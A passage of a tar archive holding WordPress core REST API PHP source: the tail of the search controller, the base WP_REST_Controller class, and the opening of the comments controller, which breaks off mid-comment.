$this->namespace,
'/' . $this->rest_base,
array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permission_check' ),
'args' => $this->get_collection_params(),
),
'schema' => array( $this, 'get_public_item_schema' ),
)
);
}
/**
* Checks if a given request has access to search content.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return true|WP_Error True if the request has search access, WP_Error object otherwise.
*/
public function get_items_permission_check( $request ) {
return true;
}
/**
* Retrieves a collection of search results.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
$handler = $this->get_search_handler( $request );
if ( is_wp_error( $handler ) ) {
return $handler;
}
$result = $handler->search_items( $request );
if ( ! isset( $result[ WP_REST_Search_Handler::RESULT_IDS ] ) || ! is_array( $result[ WP_REST_Search_Handler::RESULT_IDS ] ) || ! isset( $result[ WP_REST_Search_Handler::RESULT_TOTAL ] ) ) {
return new WP_Error( 'rest_search_handler_error', __( 'Internal search handler error.' ), array( 'status' => 500 ) );
}
$ids = array_map( 'absint', $result[ WP_REST_Search_Handler::RESULT_IDS ] );
$results = array();
foreach ( $ids as $id ) {
$data = $this->prepare_item_for_response( $id, $request );
$results[] = $this->prepare_response_for_collection( $data );
}
$total = (int) $result[ WP_REST_Search_Handler::RESULT_TOTAL ];
$page = (int) $request['page'];
$per_page = (int) $request['per_page'];
$max_pages = ceil( $total / $per_page );
if ( $page > $max_pages && $total > 0 ) {
return new WP_Error( 'rest_search_invalid_page_number', __( 'The page number requested is larger than the number of pages available.' ), array( 'status' => 400 ) );
}
$response = rest_ensure_response( $results );
$response->header( 'X-WP-Total', $total );
$response->header( 'X-WP-TotalPages', $max_pages );
$request_params = $request->get_query_params();
$base = add_query_arg( $request_params, rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ) );
if ( $page > 1 ) {
$prev_link = add_query_arg( 'page', $page - 1, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $page < $max_pages ) {
$next_link = add_query_arg( 'page', $page + 1, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Prepares a single search result for response.
*
* @since 5.0.0
*
* @param int $id ID of the item to prepare.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $id, $request ) {
$handler = $this->get_search_handler( $request );
if ( is_wp_error( $handler ) ) {
return new WP_REST_Response();
}
$fields = $this->get_fields_for_response( $request );
$data = $handler->prepare_item( $id, $fields );
$data = $this->add_additional_fields_to_object( $data, $request );
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->filter_response_by_context( $data, $context );
$response = rest_ensure_response( $data );
$links = $handler->prepare_item_links( $id );
$links['collection'] = array(
'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ),
);
$response->add_links( $links );
return $response;
}
/**
* Retrieves the item schema, conforming to JSON Schema.
*
* @since 5.0.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
$types = array();
$subtypes = array();
foreach ( $this->search_handlers as $search_handler ) {
$types[] = $search_handler->get_type();
$subtypes = array_merge( $subtypes, $search_handler->get_subtypes() );
}
$types = array_unique( $types );
$subtypes = array_unique( $subtypes );
$schema = array(
'$schema' => 'http://json-schema.org/draft-04/schema#',
'title' => 'search-result',
'type' => 'object',
'properties' => array(
self::PROP_ID => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
'context' => array( 'view', 'embed' ),
'readonly' => true,
),
self::PROP_TITLE => array(
'description' => __( 'The title for the object.' ),
'type' => 'string',
'context' => array( 'view', 'embed' ),
'readonly' => true,
),
self::PROP_URL => array(
'description' => __( 'URL to the object.' ),
'type' => 'string',
'format' => 'uri',
'context' => array( 'view', 'embed' ),
'readonly' => true,
),
self::PROP_TYPE => array(
'description' => __( 'Object type.' ),
'type' => 'string',
'enum' => $types,
'context' => array( 'view', 'embed' ),
'readonly' => true,
),
self::PROP_SUBTYPE => array(
'description' => __( 'Object subtype.' ),
'type' => 'string',
'enum' => $subtypes,
'context' => array( 'view', 'embed' ),
'readonly' => true,
),
),
);
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieves the query params for the search results collection.
*
* @since 5.0.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$types = array();
$subtypes = array();
foreach ( $this->search_handlers as $search_handler ) {
$types[] = $search_handler->get_type();
$subtypes = array_merge( $subtypes, $search_handler->get_subtypes() );
}
$types = array_unique( $types );
$subtypes = array_unique( $subtypes );
$query_params = parent::get_collection_params();
$query_params['context']['default'] = 'view';
$query_params[ self::PROP_TYPE ] = array(
'default' => $types[0],
'description' => __( 'Limit results to items of an object type.' ),
'type' => 'string',
'enum' => $types,
);
$query_params[ self::PROP_SUBTYPE ] = array(
'default' => self::TYPE_ANY,
'description' => __( 'Limit results to items of one or more object subtypes.' ),
'type' => 'array',
'items' => array(
'enum' => array_merge( $subtypes, array( self::TYPE_ANY ) ),
'type' => 'string',
),
'sanitize_callback' => array( $this, 'sanitize_subtypes' ),
);
return $query_params;
}
/**
* Sanitizes the list of subtypes, to ensure only subtypes of the passed type are included.
*
* @since 5.0.0
*
* @param string|array $subtypes One or more subtypes.
* @param WP_REST_Request $request Full details about the request.
* @param string $parameter Parameter name.
* @return array|WP_Error List of valid subtypes, or WP_Error object on failure.
*/
public function sanitize_subtypes( $subtypes, $request, $parameter ) {
$subtypes = wp_parse_slug_list( $subtypes );
$subtypes = rest_parse_request_arg( $subtypes, $request, $parameter );
if ( is_wp_error( $subtypes ) ) {
return $subtypes;
}
// 'any' overrides any other subtype.
if ( in_array( self::TYPE_ANY, $subtypes, true ) ) {
return array( self::TYPE_ANY );
}
$handler = $this->get_search_handler( $request );
if ( is_wp_error( $handler ) ) {
return $handler;
}
return array_intersect( $subtypes, $handler->get_subtypes() );
}
/**
* Gets the search handler to handle the current request.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Search_Handler|WP_Error Search handler for the request type, or WP_Error object on failure.
*/
protected function get_search_handler( $request ) {
$type = $request->get_param( self::PROP_TYPE );
if ( ! $type || ! isset( $this->search_handlers[ $type ] ) ) {
return new WP_Error( 'rest_search_invalid_type', __( 'Invalid type parameter.' ), array( 'status' => 400 ) );
}
return $this->search_handlers[ $type ];
}
}
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-controller.php��������������������������������������������������������������0000666�����������������00000045763�15111427772�0014177 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core base controller for managing and interacting with REST API items.
*
* @since 4.7.0
*/
abstract class WP_REST_Controller {
/**
* The namespace of this controller's route.
*
* @since 4.7.0
* @var string
*/
protected $namespace;
/**
* The base of this controller's route.
*
* @since 4.7.0
* @var string
*/
protected $rest_base;
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*/
public function register_routes() {
/* translators: %s: register_routes() */
_doing_it_wrong( 'WP_REST_Controller::register_routes', sprintf( __( "Method '%s' must be overridden." ), __METHOD__ ), '4.7' );
}
/**
* Checks if a given request has access to get items.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|bool True if the request has read access, WP_Error object otherwise.
*/
public function get_items_permissions_check( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Retrieves a collection of items.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_items( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Checks if a given request has access to get a specific item.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|bool True if the request has read access for the item, WP_Error object otherwise.
*/
public function get_item_permissions_check( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Retrieves one item from the collection.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Checks if a given request has access to create items.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|bool True if the request has access to create items, WP_Error object otherwise.
*/
public function create_item_permissions_check( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Creates one item from the collection.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function create_item( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Checks if a given request has access to update a specific item.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|bool True if the request has access to update the item, WP_Error object otherwise.
*/
public function update_item_permissions_check( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Updates one item from the collection.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function update_item( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Checks if a given request has access to delete a specific item.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|bool True if the request has access to delete the item, WP_Error object otherwise.
*/
public function delete_item_permissions_check( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Deletes one item from the collection.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full data about the request.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function delete_item( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Prepares one item for create or update operation.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return WP_Error|object The prepared item, or WP_Error object on failure.
*/
protected function prepare_item_for_database( $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Prepares the item for the REST response.
*
* @since 4.7.0
*
* @param mixed $item WordPress representation of the item.
* @param WP_REST_Request $request Request object.
* @return WP_Error|WP_REST_Response Response object on success, or WP_Error object on failure.
*/
public function prepare_item_for_response( $item, $request ) {
/* translators: %s: method name */
return new WP_Error( 'invalid-method', sprintf( __( "Method '%s' not implemented. Must be overridden in subclass." ), __METHOD__ ), array( 'status' => 405 ) );
}
/**
* Prepares a response for insertion into a collection.
*
* @since 4.7.0
*
* @param WP_REST_Response $response Response object.
* @return array|mixed Response data, ready for insertion into collection data.
*/
public function prepare_response_for_collection( $response ) {
if ( ! ( $response instanceof WP_REST_Response ) ) {
return $response;
}
$data = (array) $response->get_data();
$server = rest_get_server();
$links = $server->get_compact_response_links( $response );
if ( ! empty( $links ) ) {
$data['_links'] = $links;
}
return $data;
}
/**
* Filters a response based on the context defined in the schema.
*
* @since 4.7.0
*
* @param array $data Response data to fiter.
* @param string $context Context defined in the schema.
* @return array Filtered response.
*/
public function filter_response_by_context( $data, $context ) {
$schema = $this->get_item_schema();
foreach ( $data as $key => $value ) {
if ( empty( $schema['properties'][ $key ] ) || empty( $schema['properties'][ $key ]['context'] ) ) {
continue;
}
if ( ! in_array( $context, $schema['properties'][ $key ]['context'], true ) ) {
unset( $data[ $key ] );
continue;
}
if ( 'object' === $schema['properties'][ $key ]['type'] && ! empty( $schema['properties'][ $key ]['properties'] ) ) {
foreach ( $schema['properties'][ $key ]['properties'] as $attribute => $details ) {
if ( empty( $details['context'] ) ) {
continue;
}
if ( ! in_array( $context, $details['context'], true ) ) {
if ( isset( $data[ $key ][ $attribute ] ) ) {
unset( $data[ $key ][ $attribute ] );
}
}
}
}
}
return $data;
}
/**
* Retrieves the item's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
return $this->add_additional_fields_schema( array() );
}
/**
* Retrieves the item's schema for display / public consumption purposes.
*
* @since 4.7.0
*
* @return array Public item schema data.
*/
public function get_public_item_schema() {
$schema = $this->get_item_schema();
foreach ( $schema['properties'] as &$property ) {
unset( $property['arg_options'] );
}
return $schema;
}
/**
* Retrieves the query params for the collections.
*
* @since 4.7.0
*
* @return array Query parameters for the collection.
*/
public function get_collection_params() {
return array(
'context' => $this->get_context_param(),
'page' => array(
'description' => __( 'Current page of the collection.' ),
'type' => 'integer',
'default' => 1,
'sanitize_callback' => 'absint',
'validate_callback' => 'rest_validate_request_arg',
'minimum' => 1,
),
'per_page' => array(
'description' => __( 'Maximum number of items to be returned in result set.' ),
'type' => 'integer',
'default' => 10,
'minimum' => 1,
'maximum' => 100,
'sanitize_callback' => 'absint',
'validate_callback' => 'rest_validate_request_arg',
),
'search' => array(
'description' => __( 'Limit results to those matching a string.' ),
'type' => 'string',
'sanitize_callback' => 'sanitize_text_field',
'validate_callback' => 'rest_validate_request_arg',
),
);
}
/**
* Retrieves the magical context param.
*
* Ensures consistent descriptions between endpoints, and populates enum from schema.
*
* @since 4.7.0
*
* @param array $args Optional. Additional arguments for context parameter. Default empty array.
* @return array Context parameter details.
*/
public function get_context_param( $args = array() ) {
$param_details = array(
'description' => __( 'Scope under which the request is made; determines fields present in response.' ),
'type' => 'string',
'sanitize_callback' => 'sanitize_key',
'validate_callback' => 'rest_validate_request_arg',
);
$schema = $this->get_item_schema();
if ( empty( $schema['properties'] ) ) {
return array_merge( $param_details, $args );
}
$contexts = array();
foreach ( $schema['properties'] as $attributes ) {
if ( ! empty( $attributes['context'] ) ) {
$contexts = array_merge( $contexts, $attributes['context'] );
}
}
if ( ! empty( $contexts ) ) {
$param_details['enum'] = array_unique( $contexts );
rsort( $param_details['enum'] );
}
return array_merge( $param_details, $args );
}
/**
* Adds the values from additional fields to a data object.
*
* @since 4.7.0
*
* @param array $object Data object.
* @param WP_REST_Request $request Full details about the request.
* @return array Modified data object with additional fields.
*/
protected function add_additional_fields_to_object( $object, $request ) {
$additional_fields = $this->get_additional_fields();
$requested_fields = $this->get_fields_for_response( $request );
foreach ( $additional_fields as $field_name => $field_options ) {
if ( ! $field_options['get_callback'] ) {
continue;
}
if ( ! in_array( $field_name, $requested_fields, true ) ) {
continue;
}
$object[ $field_name ] = call_user_func( $field_options['get_callback'], $object, $field_name, $request, $this->get_object_type() );
}
return $object;
}
/**
* Updates the values of additional fields added to a data object.
*
* @since 4.7.0
*
* @param array $object Data Object.
* @param WP_REST_Request $request Full details about the request.
* @return bool|WP_Error True on success, WP_Error object if a field cannot be updated.
*/
protected function update_additional_fields_for_object( $object, $request ) {
$additional_fields = $this->get_additional_fields();
foreach ( $additional_fields as $field_name => $field_options ) {
if ( ! $field_options['update_callback'] ) {
continue;
}
// Don't run the update callbacks if the data wasn't passed in the request.
if ( ! isset( $request[ $field_name ] ) ) {
continue;
}
$result = call_user_func( $field_options['update_callback'], $request[ $field_name ], $object, $field_name, $request, $this->get_object_type() );
if ( is_wp_error( $result ) ) {
return $result;
}
}
return true;
}
/**
* Adds the schema from additional fields to a schema array.
*
* The type of object is inferred from the passed schema.
*
* @since 4.7.0
*
* @param array $schema Schema array.
* @return array Modified Schema array.
*/
protected function add_additional_fields_schema( $schema ) {
if ( empty( $schema['title'] ) ) {
return $schema;
}
// Can't use $this->get_object_type otherwise we cause an inf loop.
$object_type = $schema['title'];
$additional_fields = $this->get_additional_fields( $object_type );
foreach ( $additional_fields as $field_name => $field_options ) {
if ( ! $field_options['schema'] ) {
continue;
}
$schema['properties'][ $field_name ] = $field_options['schema'];
}
return $schema;
}
/**
* Retrieves all of the registered additional fields for a given object-type.
*
* @since 4.7.0
*
* @param string $object_type Optional. The object type.
* @return array Registered additional fields (if any), empty array if none or if the object type could
* not be inferred.
*/
protected function get_additional_fields( $object_type = null ) {
if ( ! $object_type ) {
$object_type = $this->get_object_type();
}
if ( ! $object_type ) {
return array();
}
global $wp_rest_additional_fields;
if ( ! $wp_rest_additional_fields || ! isset( $wp_rest_additional_fields[ $object_type ] ) ) {
return array();
}
return $wp_rest_additional_fields[ $object_type ];
}
/**
* Retrieves the object type this controller is responsible for managing.
*
* @since 4.7.0
*
* @return string Object type for the controller.
*/
protected function get_object_type() {
$schema = $this->get_item_schema();
if ( ! $schema || ! isset( $schema['title'] ) ) {
return null;
}
return $schema['title'];
}
/**
* Gets an array of fields to be included on the response.
*
* Included fields are based on item schema and `_fields=` request argument.
*
* @since 4.9.6
*
* @param WP_REST_Request $request Full details about the request.
* @return array Fields to be included in the response.
*/
public function get_fields_for_response( $request ) {
$schema = $this->get_item_schema();
$fields = isset( $schema['properties'] ) ? array_keys( $schema['properties'] ) : array();
$additional_fields = $this->get_additional_fields();
foreach ( $additional_fields as $field_name => $field_options ) {
// For back-compat, include any field with an empty schema
// because it won't be present in $this->get_item_schema().
if ( is_null( $field_options['schema'] ) ) {
$fields[] = $field_name;
}
}
if ( ! isset( $request['_fields'] ) ) {
return $fields;
}
$requested_fields = is_array( $request['_fields'] ) ? $request['_fields'] : preg_split( '/[\s,]+/', $request['_fields'] );
if ( 0 === count( $requested_fields ) ) {
return $fields;
}
// Trim off outside whitespace from the comma delimited list.
$requested_fields = array_map( 'trim', $requested_fields );
// Always persist 'id', because it can be needed for add_additional_fields_to_object().
if ( in_array( 'id', $fields, true ) ) {
$requested_fields[] = 'id';
}
return array_intersect( $fields, $requested_fields );
}
/**
* Retrieves an array of endpoint arguments from the item schema for the controller.
*
* @since 4.7.0
*
* @param string $method Optional. HTTP method of the request. The arguments for `CREATABLE` requests are
* checked for required values and may fall-back to a given default, this is not done
* on `EDITABLE` requests. Default WP_REST_Server::CREATABLE.
* @return array Endpoint arguments.
*/
public function get_endpoint_args_for_item_schema( $method = WP_REST_Server::CREATABLE ) {
$schema = $this->get_item_schema();
$schema_properties = ! empty( $schema['properties'] ) ? $schema['properties'] : array();
$endpoint_args = array();
foreach ( $schema_properties as $field_id => $params ) {
// Arguments specified as `readonly` are not allowed to be set.
if ( ! empty( $params['readonly'] ) ) {
continue;
}
$endpoint_args[ $field_id ] = array(
'validate_callback' => 'rest_validate_request_arg',
'sanitize_callback' => 'rest_sanitize_request_arg',
);
if ( isset( $params['description'] ) ) {
$endpoint_args[ $field_id ]['description'] = $params['description'];
}
if ( WP_REST_Server::CREATABLE === $method && isset( $params['default'] ) ) {
$endpoint_args[ $field_id ]['default'] = $params['default'];
}
if ( WP_REST_Server::CREATABLE === $method && ! empty( $params['required'] ) ) {
$endpoint_args[ $field_id ]['required'] = true;
}
foreach ( array( 'type', 'format', 'enum', 'items', 'properties', 'additionalProperties' ) as $schema_prop ) {
if ( isset( $params[ $schema_prop ] ) ) {
$endpoint_args[ $field_id ][ $schema_prop ] = $params[ $schema_prop ];
}
}
// Merge in any options provided by the schema property.
if ( isset( $params['arg_options'] ) ) {
// Only use required / default from arg_options on CREATABLE endpoints.
if ( WP_REST_Server::CREATABLE !== $method ) {
$params['arg_options'] = array_diff_key( $params['arg_options'], array( 'required' => '', 'default' => '' ) );
}
$endpoint_args[ $field_id ] = array_merge( $endpoint_args[ $field_id ], $params['arg_options'] );
}
}
return $endpoint_args;
}
/**
* Sanitizes the slug value.
*
* @since 4.7.0
*
* @internal We can't use sanitize_title() directly, as the second
* parameter is the fallback title, which would end up being set to the
* request object.
*
* @see https://github.com/WP-API/WP-API/issues/1585
*
* @todo Remove this in favour of https://core.trac.wordpress.org/ticket/34659
*
* @param string $slug Slug value passed in request.
* @return string Sanitized value for the slug.
*/
public function sanitize_slug( $slug ) {
return sanitize_title( $slug );
}
}
�������������endpoints/class-wp-rest-comments-controller.php�����������������������������������������������������0000666�����������������00000153475�15111427772�0016022 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Comments_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core controller used to access comments via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Controller
*/
class WP_REST_Comments_Controller extends WP_REST_Controller {
/**
* Instance of a comment meta fields object.
*
* @since 4.7.0
* @var WP_REST_Comment_Meta_Fields
*/
protected $meta;
/**
* Constructor.
*
* @since 4.7.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'comments';
$this->meta = new WP_REST_Comment_Meta_Fields();
}
/**
* Registers the routes for the objects of the controller.
*
* @since 4.7.0
*/
public function register_routes() {
register_rest_route( $this->namespace, '/' . $this->rest_base, array(
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_items' ),
'permission_callback' => array( $this, 'get_items_permissions_check' ),
'args' => $this->get_collection_params(),
),
array(
'methods' => WP_REST_Server::CREATABLE,
'callback' => array( $this, 'create_item' ),
'permission_callback' => array( $this, 'create_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::CREATABLE ),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P<id>[\d]+)', array(
'args' => array(
'id' => array(
'description' => __( 'Unique identifier for the object.' ),
'type' => 'integer',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
'password' => array(
'description' => __( 'The password for the parent post of the comment (if the post is password protected).' ),
'type' => 'string',
),
),
),
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => array( $this, 'update_item' ),
'permission_callback' => array( $this, 'update_item_permissions_check' ),
'args' => $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ),
),
array(
'methods' => WP_REST_Server::DELETABLE,
'callback' => array( $this, 'delete_item' ),
'permission_callback' => array( $this, 'delete_item_permissions_check' ),
'args' => array(
'force' => array(
'type' => 'boolean',
'default' => false,
'description' => __( 'Whether to bypass trash and force deletion.' ),
),
'password' => array(
'description' => __( 'The password for the parent post of the comment (if the post is password protected).' ),
'type' => 'string',
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
) );
}
/**
* Checks if a given request has access to read comments.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|bool True if the request has read access, error object otherwise.
*/
public function get_items_permissions_check( $request ) {
if ( ! empty( $request['post'] ) ) {
foreach ( (array) $request['post'] as $post_id ) {
$post = get_post( $post_id );
if ( ! empty( $post_id ) && $post && ! $this->check_read_post_permission( $post, $request ) ) {
return new WP_Error( 'rest_cannot_read_post', __( 'Sorry, you are not allowed to read the post for this comment.' ), array( 'status' => rest_authorization_required_code() ) );
} elseif ( 0 === $post_id && ! current_user_can( 'moderate_comments' ) ) {
return new WP_Error( 'rest_cannot_read', __( 'Sorry, you are not allowed to read comments without a post.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
}
if ( ! empty( $request['context'] ) && 'edit' === $request['context'] && ! current_user_can( 'moderate_comments' ) ) {
return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to edit comments.' ), array( 'status' => rest_authorization_required_code() ) );
}
if ( ! current_user_can( 'edit_posts' ) ) {
$protected_params = array( 'author', 'author_exclude', 'author_email', 'type', 'status' );
$forbidden_params = array();
foreach ( $protected_params as $param ) {
if ( 'status' === $param ) {
if ( 'approve' !== $request[ $param ] ) {
$forbidden_params[] = $param;
}
} elseif ( 'type' === $param ) {
if ( 'comment' !== $request[ $param ] ) {
$forbidden_params[] = $param;
}
} elseif ( ! empty( $request[ $param ] ) ) {
$forbidden_params[] = $param;
}
}
if ( ! empty( $forbidden_params ) ) {
return new WP_Error( 'rest_forbidden_param', sprintf( __( 'Query parameter not permitted: %s' ), implode( ', ', $forbidden_params ) ), array( 'status' => rest_authorization_required_code() ) );
}
}
return true;
}
/**
* Retrieves a list of comment items.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, or error object on failure.
*/
public function get_items( $request ) {
// Retrieve the list of registered collection query parameters.
$registered = $this->get_collection_params();
/*
* This array defines mappings between public API query parameters whose
* values are accepted as-passed, and their internal WP_Query parameter
* name equivalents (some are the same). Only values which are also
* present in $registered will be set.
*/
$parameter_mappings = array(
'author' => 'author__in',
'author_email' => 'author_email',
'author_exclude' => 'author__not_in',
'exclude' => 'comment__not_in',
'include' => 'comment__in',
'offset' => 'offset',
'order' => 'order',
'parent' => 'parent__in',
'parent_exclude' => 'parent__not_in',
'per_page' => 'number',
'post' => 'post__in',
'search' => 'search',
'status' => 'status',
'type' => 'type',
);
$prepared_args = array();
/*
* For each known parameter which is both registered and present in the request,
* set the parameter's value on the query $prepared_args.
*/
foreach ( $parameter_mappings as $api_param => $wp_param ) {
if ( isset( $registered[ $api_param ], $request[ $api_param ] ) ) {
$prepared_args[ $wp_param ] = $request[ $api_param ];
}
}
// Ensure certain parameter values default to empty strings.
foreach ( array( 'author_email', 'search' ) as $param ) {
if ( ! isset( $prepared_args[ $param ] ) ) {
$prepared_args[ $param ] = '';
}
}
if ( isset( $registered['orderby'] ) ) {
$prepared_args['orderby'] = $this->normalize_query_param( $request['orderby'] );
}
$prepared_args['no_found_rows'] = false;
$prepared_args['date_query'] = array();
// Set before into date query. Date query must be specified as an array of an array.
if ( isset( $registered['before'], $request['before'] ) ) {
$prepared_args['date_query'][0]['before'] = $request['before'];
}
// Set after into date query. Date query must be specified as an array of an array.
if ( isset( $registered['after'], $request['after'] ) ) {
$prepared_args['date_query'][0]['after'] = $request['after'];
}
if ( isset( $registered['page'] ) && empty( $request['offset'] ) ) {
$prepared_args['offset'] = $prepared_args['number'] * ( absint( $request['page'] ) - 1 );
}
/**
* Filters arguments, before passing to WP_Comment_Query, when querying comments via the REST API.
*
* @since 4.7.0
*
* @link https://developer.wordpress.org/reference/classes/wp_comment_query/
*
* @param array $prepared_args Array of arguments for WP_Comment_Query.
* @param WP_REST_Request $request The current request.
*/
$prepared_args = apply_filters( 'rest_comment_query', $prepared_args, $request );
$query = new WP_Comment_Query;
$query_result = $query->query( $prepared_args );
$comments = array();
foreach ( $query_result as $comment ) {
if ( ! $this->check_read_permission( $comment, $request ) ) {
continue;
}
$data = $this->prepare_item_for_response( $comment, $request );
$comments[] = $this->prepare_response_for_collection( $data );
}
$total_comments = (int) $query->found_comments;
$max_pages = (int) $query->max_num_pages;
if ( $total_comments < 1 ) {
// Out-of-bounds, run the query again without LIMIT for total count.
unset( $prepared_args['number'], $prepared_args['offset'] );
$query = new WP_Comment_Query;
$prepared_args['count'] = true;
$total_comments = $query->query( $prepared_args );
$max_pages = ceil( $total_comments / $request['per_page'] );
}
$response = rest_ensure_response( $comments );
$response->header( 'X-WP-Total', $total_comments );
$response->header( 'X-WP-TotalPages', $max_pages );
$base = add_query_arg( $request->get_query_params(), rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ) );
if ( $request['page'] > 1 ) {
$prev_page = $request['page'] - 1;
if ( $prev_page > $max_pages ) {
$prev_page = $max_pages;
}
$prev_link = add_query_arg( 'page', $prev_page, $base );
$response->link_header( 'prev', $prev_link );
}
if ( $max_pages > $request['page'] ) {
$next_page = $request['page'] + 1;
$next_link = add_query_arg( 'page', $next_page, $base );
$response->link_header( 'next', $next_link );
}
return $response;
}
/**
* Get the comment, if the ID is valid.
*
* @since 4.7.2
*
* @param int $id Supplied ID.
* @return WP_Comment|WP_Error Comment object if ID is valid, WP_Error otherwise.
*/
protected function get_comment( $id ) {
$error = new WP_Error( 'rest_comment_invalid_id', __( 'Invalid comment ID.' ), array( 'status' => 404 ) );
if ( (int) $id <= 0 ) {
return $error;
}
$id = (int) $id;
$comment = get_comment( $id );
if ( empty( $comment ) ) {
return $error;
}
if ( ! empty( $comment->comment_post_ID ) ) {
$post = get_post( (int) $comment->comment_post_ID );
if ( empty( $post ) ) {
return new WP_Error( 'rest_post_invalid_id', __( 'Invalid post ID.' ), array( 'status' => 404 ) );
}
}
return $comment;
}
/**
* Checks if a given request has access to read the comment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
